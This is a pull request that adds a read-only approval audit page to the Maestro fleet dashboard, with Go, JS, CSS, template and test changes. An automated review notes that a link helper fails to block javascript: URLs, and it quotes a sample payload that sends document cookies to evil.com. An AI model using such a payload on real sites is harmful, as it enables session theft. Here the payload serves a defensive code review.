### PR TITLE
feat: split fleet approval inbox from audit history (#335)

### DIFF
--- a/internal/server/fleet.go
+++ b/internal/server/fleet.go
@@ -155,6 +155,7 @@ func (s *FleetServer) Start(ctx context.Context) error {
 	mux.HandleFunc("/api/v1/fleet/worker", s.handleFleetWorker)
 	mux.HandleFunc("/api/v1/fleet", s.handleFleet)
 	mux.HandleFunc("/api/v1/fleet/actions", s.handleFleetAction)
+	mux.HandleFunc("/approvals/audit", s.handleFleetApprovalAudit)
 	mux.Handle("/static/", web.StaticHandler())
 	mux.HandleFunc("/", s.handleFleetDashboard)
 
@@ -1711,6 +1712,7 @@ func (s *FleetServer) handleFleetDashboard(w http.ResponseWriter, r *http.Reques
 }
 
 var fleetDashboardHTML = web.MustReadTemplate("fleet.html")
+var fleetApprovalAuditHTML = web.MustReadTemplate("approvals-audit.html")
 
 func renderFleetDashboardHTML(snapshot fleetResponse) (string, error) {
 	data, err := json.Marshal(snapshot)
@@ -1723,6 +1725,174 @@ func renderFleetDashboardHTML(snapshot fleetResponse) (string, error) {
 		"{{FLEET_INITIAL_STATE}}", string(data),
 	).Replace(fleetDashboardHTML)
 	return body, nil
+}
+
+func (s *FleetServer) handleFleetApprovalAudit(w http.ResponseWriter, r *http.Request) {
+	if r.URL.Path != "/approvals/audit" {
+		http.NotFound(w, r)
+		return
+	}
+	body, err := renderFleetApprovalAuditHTML(s.snapshot())
+	if err != nil {
+		writeError(w, http.StatusInternalServerError, err.Error())
+		return
+	}
+	w.Header().Set("Content-Type", "text/html; charset=utf-8")
+	fmt.Fprint(w, body)
+}
+
+func renderFleetApprovalAuditHTML(snapshot fleetResponse) (string, error) {
+	historical := historicalFleetApprovals(snapshot.Approvals)
+	body := strings.NewReplacer(
+		"{{APPROVAL_AUDIT_SUBTITLE}}", html.EscapeString(approvalAuditSubtitle(snapshot)),
+		"{{APPROVAL_AUDIT_SUMMARY}}", html.EscapeString(approvalAuditSummary(historical)),
+		"{{APPROVAL_AUDIT_ROWS}}", renderFleetApprovalAuditRows(historical),
+	).Replace(fleetApprovalAuditHTML)
+	return body, nil
+}
+
+func historicalFleetApprovals(items []fleetApprovalState) []fleetApprovalState {
+	out := make([]fleetApprovalState, 0, len(items))
+	for _, item := range items {
+		if state.ApprovalStatus(item.Status) != state.ApprovalStatusPending {
+			out = append(out, item)
+		}
+	}
+	return out
+}
+
+func approvalAuditSubtitle(snapshot fleetResponse) string {
+	return fmt.Sprintf("%d configured projects · %d active pending approvals", snapshot.Summary.Projects, snapshot.Summary.ApprovalsPending)
+}
+
+func approvalAuditSummary(items []fleetApprovalState) string {
+	if len(items) == 0 {
+		return "No historical approvals recorded."
+	}
+	counts := make(map[string]int)
+	for _, item := range items {
+		counts[item.Status]++
+	}
+	return approvalHistoryCountTextForAudit(counts, len(items))
+}
+
+func approvalHistoryCountTextForAudit(counts map[string]int, historicalCount int) string {
+	known := counts[string(state.ApprovalStatusSuperseded)] + counts[string(state.ApprovalStatusStale)] + counts[string(state.ApprovalStatusApproved)] + counts[string(state.ApprovalStatusRejected)]
+	parts := make([]string, 0, 5)
+	appendPart := func(count int, label string) {
+		if count > 0 {
+			parts = append(parts, fmt.Sprintf("%d %s", count, label))
+		}
+	}
+	appendPart(counts[string(state.ApprovalStatusSuperseded)], "superseded")
+	appendPart(counts[string(state.ApprovalStatusStale)], "stale")
+	appendPart(counts[string(state.ApprovalStatusApproved)], "approved")
+	appendPart(counts[string(state.ApprovalStatusRejected)], "rejected")
+	if other := historicalCount - known; other > 0 {
+		appendPart(other, "other")
+	}
+	if len(parts) == 0 {
+		return "No historical approvals"
+	}
+	return strings.Join(parts, " · ")
+}
+
+func renderFleetApprovalAuditRows(items []fleetApprovalState) string {
+	if len(items) == 0 {
+		return `<div class="empty approval-empty approval-audit-empty">No historical approvals have been recorded yet.</div>`
+	}
+	var b strings.Builder
+	for _, item := range items {
+		b.WriteString(renderFleetApprovalCard(item, true))
+	}
+	return b.String()
+}
+
+func renderFleetApprovalCard(approval fleetApprovalState, muted bool) string {
+	project := html.EscapeString(firstNonEmpty(approval.ProjectName, "-"))
+	id := html.EscapeString(firstNonEmpty(approval.ID, "-"))
+	action := html.EscapeString(actionLabelServer(firstNonEmpty(approval.Action, "-")))
+	createdAge := html.EscapeString(firstNonEmpty(approval.CreatedAge, "-"))
+	updatedAge := html.EscapeString(firstNonEmpty(approval.UpdatedAge, "-"))
+	summary := html.EscapeString(firstNonEmpty(approval.Summary, "No summary recorded."))
+	sessionStatus := ""
+	if strings.TrimSpace(approval.SessionStatus) != "" {
+		sessionStatus = `<span>Status ` + html.EscapeString(approval.SessionStatus) + `</span>`
+	}
+	classes := []string{"approval-card", "approval-" + cssTokenServer(approval.Status)}
+	if muted {
+		classes = append(classes, "approval-card-muted")
+	}
+	return `<article class="` + strings.Join(classes, " ") + `" title="` + summary + `">` +
+		`<div class="approval-project"><strong title="` + project + `">` + linkHTMLServer(approval.DashboardURL, project) + `</strong>` +
+		`<div class="approval-meta"><span title="` + id + `">` + id + `</span></div></div>` +
+		`<div class="approval-action"><strong title="` + action + `">` + action + `</strong>` +
+		`<div class="approval-meta"><span class="` + approvalStatusClassServer(approval.Status) + `">` + html.EscapeString(firstNonEmpty(approval.Status, "unknown")) + `</span></div></div>` +
+		`<div class="approval-target">` + renderFleetApprovalTargetHTML(approval) + sessionStatus + `</div>` +
+		`<div class="approval-main"><div class="approval-age"><span>Created ` + createdAge + ` ago</span><span>Updated ` + updatedAge + ` ago</span></div>` +
+		`<div class="approval-risk"><span>Risk ` + html.EscapeString(firstNonEmpty(approval.Risk, "-")) + `</span></div>` +
+		`<div class="approval-summary">` + summary + `</div></div>` +
+		`</article>`
+}
+
+func renderFleetApprovalTargetHTML(approval fleetApprovalState) string {
+	parts := make([]string, 0, 3)
+	if approval.IssueNumber > 0 {
+		parts = append(parts, linkHTMLServer(approval.IssueURL, fmt.Sprintf("Issue #%d", approval.IssueNumber)))
+	}
+	if approval.PRNumber > 0 {
+		parts = append(parts, linkHTMLServer(approval.PRURL, fmt.Sprintf("PR #%d", approval.PRNumber)))
+	}
+	if strings.TrimSpace(approval.Session) != "" {
+		parts = append(parts, `<span>Session `+html.EscapeString(approval.Session)+`</span>`)
+	}
+	if len(parts) == 0 {
+		return `<span class="empty">No target</span>`
+	}
+	return strings.Join(parts, " ")
+}
+
+func approvalStatusClassServer(status string) string {
+	return "pill a-" + cssTokenServer(status)
+}
+
+func actionLabelServer(action string) string {
+	return strings.ReplaceAll(strings.TrimSpace(firstNonEmpty(action, "-")), "_", " ")
+}
+
+func cssTokenServer(value string) string {
+	value = strings.ToLower(strings.TrimSpace(firstNonEmpty(value, "unknown")))
+	if value == "" {
+		return "unknown"
+	}
+	var b strings.Builder
+	lastUnderscore := false
+	for _, r := range value {
+		switch {
+		case (r >= 'a' && r <= 'z') || (r >= '0' && r <= '9') || r == '-' || r == '_':
+			b.WriteRune(r)
+			lastUnderscore = false
+		default:
+			if !lastUnderscore {
+				b.WriteByte('_')
+				lastUnderscore = true
+			}
+		}
+	}
+	out := strings.Trim(b.String(), "_")
+	if out == "" {
+		return "unknown"
+	}
+	return out
+}
+
+func linkHTMLServer(url, label string) string {
+	text := html.EscapeString(firstNonEmpty(label, "-"))
+	href := strings.TrimSpace(url)
+	if href == "" {
+		return text
+	}
+	return `<a href="` + html.EscapeString(href) + `" target="_blank" rel="noreferrer">` + text + `</a>`
 }
 
 func fleetProjectRailSummary(projects []fleetProjectState) string {

--- a/internal/server/fleet_test.go
+++ b/internal/server/fleet_test.go
@@ -1488,9 +1488,9 @@ func TestFleetDashboard(t *testing.T) {
 		"approval-list-compact",
 		"Audit history",
 		"approvalHistoryCountText",
-		"<details class=\"approval-history\"' + (historyWasOpen ? ' open' : '') + '>",
-		"const historyWasOpen = historyDetails ? historyDetails.open : false;",
-		"(historyWasOpen ? ' open' : '')",
+		"approval-audit-link",
+		"approval-history-link-card",
+		"Open full approval audit",
 		".approval-card.approval-stale { border-left-color: var(--line);",
 		".approval-card.approval-superseded { border-left-color: var(--line);",
 		".a-stale { color: var(--muted);",
@@ -1754,6 +1754,20 @@ func TestFleetDashboardServesFleetPath(t *testing.T) {
 	}
 	if !contains(w.Body.String(), "Projects") {
 		t.Fatal("/fleet should serve the fleet dashboard")
+	}
+}
+
+func TestFleetDashboardServesApprovalAuditPath(t *testing.T) {
+	srv := NewFleet(nil, "127.0.0.1", 8786, true)
+	req := httptest.NewRequest(http.MethodGet, "/approvals/audit", nil)
+	w := httptest.NewRecorder()
+	srv.handleFleetApprovalAudit(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("status = %d, want %d", w.Code, http.StatusOK)
+	}
+	if !contains(w.Body.String(), "Historical Approvals") || !contains(w.Body.String(), "Back to Fleet") {
+		t.Fatalf("approval audit should render dedicated audit page, got:\n%s", w.Body.String())
 	}
 }
 

--- a/internal/server/web/static/fleet.css
+++ b/internal/server/web/static/fleet.css
@@ -412,6 +412,29 @@
   }
   .approval-list.approval-list-compact { gap: 8px; padding: 8px 14px 10px; }
   .approval-active-list, .approval-history-list { display: grid; gap: 8px; }
+  .approval-history-link-card {
+    display: flex;
+    flex-wrap: wrap;
+    align-items: center;
+    justify-content: space-between;
+    gap: 8px 14px;
+    padding: 10px 12px;
+    border: 1px solid rgba(215,222,232,.9);
+    border-radius: 10px;
+    background: rgba(248,250,252,.85);
+    color: var(--muted);
+    font-size: 13px;
+  }
+  .approval-history-link-card strong {
+    color: var(--text);
+    font-weight: 650;
+  }
+  .approval-history-link-card a {
+    color: var(--accent);
+    font-weight: 650;
+    text-decoration: none;
+  }
+  .approval-history-link-card a:hover { text-decoration: underline; }
   .approval-history {
     border: 1px solid rgba(215,222,232,.85);
     background: rgba(248,250,252,.92);
@@ -449,6 +472,7 @@
   .approval-card.approval-superseded { border-left-color: var(--line); background: rgba(139,148,158,.06); }
   .approval-card.approval-approved { border-left-color: var(--ok); background: rgba(63,185,80,.06); }
   .approval-card.approval-rejected { border-left-color: var(--line); background: rgba(139,148,158,.05); }
+  .approval-card.approval-card-muted { background: rgba(255,255,255,.78); }
   .approval-project,
   .approval-action,
   .approval-target,
@@ -472,6 +496,8 @@
   }
   .approval-target { display: flex; flex-wrap: wrap; gap: 6px; align-content: flex-start; font-size: 12px; }
   .approval-summary { margin-top: 5px; color: var(--text); line-height: 1.35; }
+  .approval-audit-page { margin-top: 0; }
+  .approval-audit-list { padding-top: 14px; }
   .link-button {
     border: 0;
     background: transparent;
@@ -672,6 +698,14 @@
   }
   .section-head h2 { margin: 0; font-size: 17px; }
   .section-note { color: var(--muted); font-size: 13px; text-align: right; }
+  .section-note-group {
+    display: flex;
+    flex-wrap: wrap;
+    align-items: center;
+    justify-content: flex-end;
+    gap: 8px;
+    max-width: min(560px, 100%);
+  }
   .worker-scope-status {
     display: flex;
     flex-wrap: wrap;

--- a/internal/server/web/static/fleet.js
+++ b/internal/server/web/static/fleet.js
@@ -12,6 +12,7 @@ const subtitleEl = document.getElementById("subtitle");
 const fleetVerdictEl = document.getElementById("fleet-verdict");
 const approvalListEl = document.getElementById("approval-list");
 const approvalSummaryEl = document.getElementById("approval-summary");
+const approvalAuditLinkEl = document.getElementById("approval-audit-link");
 const attentionListEl = document.getElementById("attention-list");
 const attentionSummaryEl = document.getElementById("attention-summary");
 const fleetWorkersEl = document.getElementById("fleet-workers-body");
@@ -240,7 +241,7 @@ function approvalInboxSummaryText(activeCount, historicalCount) {
     ? "No active approvals need review."
     : pluralize(activeCount, "active pending approval") + " " + (activeCount === 1 ? "needs" : "need") + " review.";
   if (!historicalCount) return active + " No historical approvals are recorded.";
-  return active + " " + pluralize(historicalCount, "historical approval") + " " + (historicalCount === 1 ? "is" : "are") + " collapsed below.";
+  return active + " " + pluralize(historicalCount, "historical approval") + " moved to audit history.";
 }
 
 function approvalHistoryCountText(counts, historicalCount) {
@@ -304,17 +305,17 @@ function renderApprovalInbox() {
   }, {});
   const pending = approvals.filter(isPendingApproval);
   const historical = approvals.filter(approval => !isPendingApproval(approval));
-  const historyDetails = approvalListEl.querySelector(".approval-history");
-  const historyWasOpen = historyDetails ? historyDetails.open : false;
   approvalListEl.classList.toggle("approval-list-compact", pending.length === 0);
   approvalSummaryEl.textContent = approvalInboxSummaryText(pending.length, historical.length);
+  if (approvalAuditLinkEl) {
+    approvalAuditLinkEl.hidden = historical.length === 0;
+  }
 
   const activeHTML = pending.length
     ? '<div class="approval-active-list">' + pending.map(approvalCardHTML).join("") + '</div>'
     : '<div class="empty approval-empty approval-active-empty">No pending approvals need review.</div>';
   const historyHTML = historical.length
-    ? '<details class="approval-history"' + (historyWasOpen ? ' open' : '') + '><summary><strong>Audit history</strong><span>' + escapeText(approvalHistoryCountText(counts, historical.length)) + '</span></summary>' +
-      '<div class="approval-history-list">' + historical.map(approvalCardHTML).join("") + '</div></details>'
+    ? '<div class="approval-history-link-card"><strong>Audit history</strong><span>' + escapeText(approvalHistoryCountText(counts, historical.length)) + '</span><a href="/approvals/audit">Open full approval audit</a></div>'
     : '';
   approvalListEl.innerHTML = activeHTML + historyHTML;
 

--- a/internal/server/web/templates/approvals-audit.html
+++ b/internal/server/web/templates/approvals-audit.html
@@ -1,0 +1,50 @@
+<!DOCTYPE html>
+<html data-theme="light">
+<head>
+<title>maestro approval audit</title>
+<meta name="viewport" content="width=device-width, initial-scale=1">
+<meta name="theme-color" content="#f7fafa">
+<meta property="og:type" content="website">
+<meta property="og:title" content="Maestro">
+<meta property="og:description" content="Supervisor approval audit history across the fleet.">
+<meta property="og:image" content="/static/og-1200x630.png">
+<meta property="og:image:alt" content="Maestro mark and tagline">
+<link rel="icon" href="/static/maestro-mark.svg" type="image/svg+xml">
+<link rel="icon" href="/static/favicon-16.png" type="image/png" sizes="16x16">
+<link rel="icon" href="/static/favicon-32.png" type="image/png" sizes="32x32">
+<link rel="icon" href="/static/favicon-48.png" type="image/png" sizes="48x48">
+<link rel="apple-touch-icon" href="/static/apple-touch-icon-180.png" sizes="180x180">
+<link rel="preload" href="/static/status-icons.svg" as="image" type="image/svg+xml">
+<link rel="stylesheet" href="/static/tokens.css?v=20260502-7">
+<link rel="stylesheet" href="/static/components.css?v=20260502-7">
+<link rel="stylesheet" href="/static/fleet.css?v=20260502-7">
+</head>
+<body data-page="approval-audit">
+<header class="fleet-header">
+  <div class="brand-heading">
+    <img class="brand-mark" src="/static/maestro-mark.svg" alt="" aria-hidden="true">
+    <div>
+      <h1 aria-label="Maestro Approval Audit"><span>Maestro</span><span class="title-slash">/</span><span>Approval Audit</span></h1>
+      <div class="sub">{{APPROVAL_AUDIT_SUBTITLE}}</div>
+    </div>
+  </div>
+  <div class="header-actions">
+    <a class="scope-reset-button" href="/fleet">Back to Fleet</a>
+  </div>
+</header>
+<main>
+  <section class="approval-inbox approval-audit-page" aria-live="polite">
+    <div class="section-head">
+      <div>
+        <h2>Historical Approvals</h2>
+        <div class="sub">Read-only supervisor approval history across all configured projects.</div>
+      </div>
+      <div class="section-note">{{APPROVAL_AUDIT_SUMMARY}}</div>
+    </div>
+    <div class="approval-list approval-audit-list">
+      {{APPROVAL_AUDIT_ROWS}}
+    </div>
+  </section>
+</main>
+</body>
+</html>

--- a/internal/server/web/templates/fleet.html
+++ b/internal/server/web/templates/fleet.html
@@ -15,9 +15,9 @@
 <link rel="icon" href="/static/favicon-48.png" type="image/png" sizes="48x48">
 <link rel="apple-touch-icon" href="/static/apple-touch-icon-180.png" sizes="180x180">
 <link rel="preload" href="/static/status-icons.svg" as="image" type="image/svg+xml">
-<link rel="stylesheet" href="/static/tokens.css?v=20260502-6">
-<link rel="stylesheet" href="/static/components.css?v=20260502-6">
-<link rel="stylesheet" href="/static/fleet.css?v=20260502-6">
+<link rel="stylesheet" href="/static/tokens.css?v=20260502-7">
+<link rel="stylesheet" href="/static/components.css?v=20260502-7">
+<link rel="stylesheet" href="/static/fleet.css?v=20260502-7">
 
 </head>
 <body data-page="fleet">
@@ -89,9 +89,12 @@
     <div class="section-head">
       <div>
         <h2>Approval Inbox</h2>
-        <div class="sub">Read-only lifecycle view of supervisor approvals across projects.</div>
+        <div class="sub">Pending supervisor approvals that need review now. Historical approvals live in audit history.</div>
       </div>
-      <div class="section-note" id="approval-summary">Loading approvals...</div>
+      <div class="section-note-group">
+        <a class="scope-reset-button" id="approval-audit-link" href="/approvals/audit" hidden>Open audit history</a>
+        <div class="section-note" id="approval-summary">Loading approvals...</div>
+      </div>
     </div>
     <div class="approval-list" id="approval-list"></div>
   </section>
@@ -162,7 +165,7 @@
   </section>
 </main>
 <script type="application/json" id="fleet-initial-state">{{FLEET_INITIAL_STATE}}</script>
-<script src="/static/fleet.js?v=20260502-6"></script>
+<script src="/static/fleet.js?v=20260502-7"></script>
 
 </body>
 </html>


### PR DESCRIPTION
## Summary
- keep /fleet focused on pending approvals only
- move historical approvals into a dedicated read-only /approvals/audit page
- add a compact audit link card on /fleet instead of rendering historical approvals inline
- bump fleet asset versions to 20260502-7

## Verification
- /usr/bin/node --check internal/server/web/static/fleet.js
- /usr/local/bin/go test ./internal/server
- /usr/local/bin/go test ./...
- /usr/local/bin/go build -o /tmp/maestro ./cmd/maestro
- smoke served /fleet and /approvals/audit on :8799

<!-- greptile_comment -->

<h3>Greptile Summary</h3>

This PR splits the fleet approval inbox into two pages: `/fleet` now shows only pending approvals with a compact link card, while a new server-rendered `/approvals/audit` page displays the full historical record. The Go-side rendering pipeline is new and generally well-structured, with one security concern in the newly introduced `linkHTMLServer` helper.

<h3>Confidence Score: 4/5</h3>

Safe to merge after addressing the javascript: XSS risk in linkHTMLServer.

One P1 security finding in the new linkHTMLServer function limits confidence; all other changes (CSS, JS, templates, tests) are clean.

internal/server/fleet.go — specifically the linkHTMLServer function and its callers in renderFleetApprovalTargetHTML and renderFleetApprovalCard.

<details open><summary><h3>Security Review</h3></summary>

- **XSS via `javascript:` href** (`internal/server/fleet.go` · `linkHTMLServer`): `html.EscapeString` is applied to the `href` value but does not strip non-HTTP(S) schemes. If `approval.DashboardURL`, `approval.IssueURL`, or `approval.PRURL` originate from external data (e.g., webhook payloads), a stored `javascript:` URI would render as a clickable link and execute in the browser. URL scheme validation (`strings.HasPrefix(href, "https://") || strings.HasPrefix(href, "http://")`) should be added before emitting the anchor tag.
</details>

<h3>Important Files Changed</h3>

| Filename | Overview |
|----------|----------|
| internal/server/fleet.go | Adds `/approvals/audit` route and server-side rendering pipeline for historical approvals; introduces `linkHTMLServer` which passes URLs to `html.EscapeString` but does not block `javascript:` schemes, creating a stored XSS risk. |
| internal/server/fleet_test.go | Updates existing snapshot assertions to match new audit-link pattern and adds `TestFleetDashboardServesApprovalAuditPath` verifying the new route returns 200 with expected content. |
| internal/server/web/static/fleet.css | Adds styles for `.approval-history-link-card`, `.approval-card-muted`, `.approval-audit-page`, `.approval-audit-list`, and `.section-note-group`; clean additions with no conflicts. |
| internal/server/web/static/fleet.js | Replaces inline `<details>` history expansion with a compact link card pointing to `/approvals/audit`; `approvalAuditLinkEl` hidden/shown correctly based on historical count. |
| internal/server/web/templates/approvals-audit.html | New SSR-only audit page template with correct back-link to `/fleet`; `{{APPROVAL_AUDIT_ROWS}}` is intentionally raw HTML (pre-escaped in Go), other placeholders are escaped server-side. |
| internal/server/web/templates/fleet.html | Asset version bumped to `20260502-7`, inline approval summary description updated, and new `section-note-group` wrapper added with initially-hidden audit link; straightforward template update. |

</details>

<details><summary>Prompt To Fix All With AI</summary>

`````markdown
Fix the following 1 code review issue. Work through them one at a time, proposing concise fixes.

---

### Issue 1 of 1
internal/server/fleet.go:1889-1895
**`javascript:` XSS via unvalidated URL scheme**

`html.EscapeString` escapes HTML entities but does not block `javascript:` URIs. If `approval.DashboardURL`, `approval.IssueURL`, or `approval.PRURL` are sourced from external systems (e.g., GitHub webhook payloads), a stored value like `javascript:fetch('//evil.com?c='+document.cookie)` would render as a valid, clickable link and execute in the browser.

```go
func linkHTMLServer(url, label string) string {
	text := html.EscapeString(firstNonEmpty(label, "-"))
	href := strings.TrimSpace(url)
	if href == "" {
		return text
	}
	if !strings.HasPrefix(href, "https://") && !strings.HasPrefix(href, "http://") {
		return text
	}
	return `<a href="` + html.EscapeString(href) + `" target="_blank" rel="noreferrer">` + text + `</a>`
}
```

`````

</details>

<sub>Reviews (1): Last reviewed commit: ["feat: split fleet approval inbox from au..."](https://github.com/befeast/maestro/commit/4f6618a1ef4ab0f3fc6309f9d26cb00a1e2d5377) | [Re-trigger Greptile](https://app.greptile.com/api/retrigger?id=30569728)</sub>

> Greptile also left **1 inline comment** on this PR.

<!-- /greptile_comment -->